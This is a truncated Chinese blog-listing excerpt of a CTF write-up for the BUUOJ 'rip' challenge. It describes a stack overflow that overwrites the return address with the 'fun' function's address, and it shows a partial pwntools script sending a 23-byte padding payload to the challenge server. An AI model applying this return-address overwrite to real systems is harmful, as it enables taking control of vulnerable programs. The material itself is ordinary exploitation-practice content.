buuoj —— rip
常规思路s溢出后将返回地址修改为fun函数地址,然而出错了from pwn import *# context(os="linux", arch="amd64", log_level="debug")p = remote('node3.buuoj.cn',27714)# p = process('./pwn1')elf = ELF("./pwn1")f_addr = elf.symbols["fun"]payload = 'a'*23 + p64(f_addr)p.sendline(pa
原创
2021-05-27 19:31:11 ·
555 阅读 ·
0 评论